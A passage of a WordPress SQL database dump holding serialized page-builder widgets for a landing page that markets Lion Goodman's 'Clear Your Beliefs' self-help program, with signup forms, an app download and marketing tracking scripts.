an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:525:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1330, 1787, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1466:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2127:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1210:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" style="position: relative; bottom: -50px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2812:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:525:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1341, 1793, '_edit_last', '2'),
(1342, 1793, '_wp_page_template', 'default'),
(1343, 1793, 'panels_data', 'a:3:{s:7:"widgets";a:7:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1392:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p"><center><strong>Download the free eBook.</strong></center>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div>\n<div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1934:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1"><center><strong>DOWNLOAD the FREE APP</strong></center></p>\n<p class="tri-panel-p tri-panel-2nd-p-2"><center>Start Clearing Whatever Is In The Way Right Now!</center></p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n\n<div class="form-input-container-button" style="bottom: -5px !important; position: relative;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1271:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px; line-height: 20px;padding-bottom: 23px;"><big><strong>Clear Your Limiting and\nNegative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="bottom: 4.6px !important; position: relative;"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1431:"<div id="divStroke" class="letter" style="padding-top: 0px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2820:"<div id="divStroke" class="letter">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback. I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:574:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n\n<hr id="lines" />\n<center><i>© Copyright 2014 by Lion Goodman</i></center>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1344, 1793, '_edit_lock', '1417044040:2'),
(1361, 1808, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:1505:"<p>[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -30px; margin-top: 15px;"><br /> <img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><p><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><br /> <input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><br /> <input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2157:"<p>[su_box title="Free App" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><form class="infusion-form nd-form-1" style="position: relative; top: 10px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><p><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input 